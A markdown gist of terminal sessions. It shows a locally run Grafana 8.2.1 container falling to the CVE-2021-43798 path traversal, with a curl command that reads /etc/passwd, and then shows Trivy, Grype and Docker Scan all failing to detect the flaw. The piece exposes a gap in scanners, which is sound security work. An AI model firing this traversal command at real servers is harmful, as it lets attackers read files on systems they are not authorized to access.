CVE-2021-43798 vs Trivy, Grype and Snyk

CVE-2021-43798-scans.md

This container is vulnerable:

stefanl@stefanl:~ $ docker run --rm -d --name=grafana -p 3000:3000 grafana/grafana:8.2.1
497f2c35813fa2f035252f241e40ef88ad24f458f5989f2e876940b0c00da698
stefanl@stefanl:~ $ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../VERSION
stefanl@stefanl:~ $ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../../../../etc/passwd | head -3
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1230  100  1230    0     0   400k      0 --:--:-- --:--:-- --:--:--  400k
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
stefanl@stefanl:~ $ 

However it isn't detected by docker scan (which uses Snyk), Aqua Trivy or Anchore Grype.

Aqua Trivy

stefanl@stefanl:~ $ trivy image --severity HIGH,CRITICAL grafana/grafana:8.2.1 |grep CVE
| busybox    | CVE-2021-42378   | HIGH     | 1.33.1-r3         | 1.33.1-r6     | busybox: use-after-free in            |
|            | CVE-2021-42379   |          |                   |               | busybox: use-after-free in            |
|            | CVE-2021-42380   |          |                   |               | busybox: use-after-free in            |
|            | CVE-2021-42381   |          |                   |               | busybox: use-after-free in            |
|            | CVE-2021-42382   |          |                   |               | busybox: use-after-free in            |
|            | CVE-2021-42383   |          |                   |               | busybox: use-after-free in            |
|            | CVE-2021-42384   |          |                   |               | busybox: use-after-free in            |
|            | CVE-2021-42385   |          |                   |               | busybox: use-after-free in            |
|            | CVE-2021-42386   |          |                   |               | busybox: use-after-free in            |
| ssl_client | CVE-2021-42378   |          |                   |               | busybox: use-after-free in            |
|            | CVE-2021-42379   |          |                   |               | busybox: use-after-free in            |
|            | CVE-2021-42380   |          |                   |               | busybox: use-after-free in            |
|            | CVE-2021-42381   |          |                   |               | busybox: use-after-free in            |
|            | CVE-2021-42382   |          |                   |               | busybox: use-after-free in            |
|            | CVE-2021-42383   |          |                   |               | busybox: use-after-free in            |
|            | CVE-2021-42384   |          |                   |               | busybox: use-after-free in            |
|            | CVE-2021-42385   |          |                   |               | busybox: use-after-free in            |
|            | CVE-2021-42386   |          |                   |               | busybox: use-after-free in            |

stefanl@stefanl:~ $ trivy -v
Version: 0.21.2
Vulnerability DB:
  Type: Full
  Version: 1
  UpdatedAt: 2021-12-13 18:39:56.916824175 +0000 UTC
  NextUpdate: 2021-12-14 00:39:56.916823575 +0000 UTC
  DownloadedAt: 2021-12-13 20:06:06.505672 +0000 UTC
stefanl@stefanl:~ 

Anchore Grype

stefanl@stefanl:~ $ grype -q grafana/grafana:8.2.1 |grep -i CVE
busybox                           1.33.1-r3                             1.33.1-r4  CVE-2021-42374       Medium    
busybox                           1.33.1-r3                             1.33.1-r5  CVE-2021-42375       Medium    
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42378       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42379       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42380       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42381       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42382       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42383       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42384       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42385       High      
busybox                           1.33.1-r3                             1.33.1-r6  CVE-2021-42386       High      
github.com/google/flatbuffers     v1.12.0                                          CVE-2020-35864       High      
github.com/grafana/loki           v1.6.2-0.20210520072447-15d417efe103             CVE-2021-36156       Medium    
github.com/prometheus/prometheus  v1.8.2-0.20210621150501-ff58416a0b02             CVE-2019-3826        Medium    
google.golang.org/protobuf        v1.27.1                                          CVE-2015-5237        High      
ssl_client                        1.33.1-r3                             1.33.1-r4  CVE-2021-42374       Medium    
ssl_client                        1.33.1-r3                             1.33.1-r5  CVE-2021-42375       Medium    
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42378       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42379       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42380       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42381       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42382       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42383       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42384       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42385       High      
ssl_client                        1.33.1-r3                             1.33.1-r6  CVE-2021-42386       High      
stefanl@stefanl:~ $ 

stefanl@stefanl:~ $ grype version
Application:          grype
Version:              0.27.0
Syft Version:         v0.32.0
BuildDate:            2021-12-08T22:17:50Z
GitCommit:            e62186725b8bfe3faddb78fa82b1ca44c747c9b6
GitTreeState:         clean
Platform:             darwin/amd64
GoVersion:            go1.16.10
Compiler:             gc
Supported DB Schema:  3
stefanl@stefanl:~ $ 

Docker Scan

stefanl@stefanl:~ $ docker scan --severity medium grafana/grafana:8.2.1 

Testing grafana/grafana:8.2.1...

Organization:      ---
Package manager:   apk
Project name:      docker-image|grafana/grafana
Docker image:      grafana/grafana:8.2.1
Platform:          linux/amd64
Base image:        grafana/grafana:8.2.1
Licenses:          enabled

✓ Tested 34 dependencies for known issues, no vulnerable paths found.

Base Image             Vulnerabilities  Severity
grafana/grafana:8.2.1  11               0 critical, 0 high, 0 medium, 11 low

Recommendations for base image upgrade:

Minor upgrades
Base Image             Vulnerabilities  Severity
grafana/grafana:8.3.2  0                0 critical, 0 high, 0 medium, 0 low


-------------------------------------------------------

Testing grafana/grafana:8.2.1...

Organization:      ---
Package manager:   gomodules
Target file:       /usr/share/grafana/bin/grafana-cli
Project name:      github.com/grafana/grafana
Docker image:      grafana/grafana:8.2.1
Licenses:          enabled

✓ Tested 279 dependencies for known issues, no vulnerable paths found.

-------------------------------------------------------

Testing grafana/grafana:8.2.1...

✗ Medium severity vulnerability found in github.com/cortexproject/cortex/pkg/tenant
  Description: Directory Traversal
  Info: https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMCORTEXPROJECTCORTEXPKGTENANT-1536565
  Introduced through: github.com/cortexproject/cortex/pkg/tenant@#d382e1d80eaf
  From: github.com/cortexproject/cortex/pkg/tenant@#d382e1d80eaf
  Fixed in: 1.10.0-rc.1

✗ High severity vulnerability found in github.com/ua-parser/uap-go/uaparser
  Description: Regular Expression Denial of Service (ReDoS)
  Info: https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMUAPARSERUAPGOUAPARSER-1569599
  Introduced through: github.com/ua-parser/uap-go/uaparser@#daf92ba38329
  From: github.com/ua-parser/uap-go/uaparser@#daf92ba38329

✗ High severity vulnerability found in github.com/russellhaering/goxmldsig
  Description: Denial of Service (DoS)
  Info: https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMRUSSELLHAERINGGOXMLDSIG-608301
  Introduced through: github.com/russellhaering/[email protected]
  From: github.com/russellhaering/[email protected]
  Fixed in: 1.1.1



Organization:      ---
Package manager:   gomodules
Target file:       /usr/share/grafana/bin/grafana-server
Project name:      github.com/grafana/grafana
Docker image:      grafana/grafana:8.2.1
Licenses:          enabled

Tested 614 dependencies for known issues, found 3 issues.


Tested 3 projects, 1 contained vulnerable paths.


stefanl@stefanl:~ $ 

stefanl@stefanl:~ $ docker scan --version
Version:    v0.11.0
Git commit: c8da19f
Provider:   Snyk (1.563.0)
stefanl@stefanl:~ $ docker --version
Docker version 20.10.11, build dea9396
stefanl@stefanl:~ $ docker scan --version
Version:    v0.11.0
Git commit: c8da19f
Provider:   Snyk (1.563.0)
stefanl@stefanl:~ $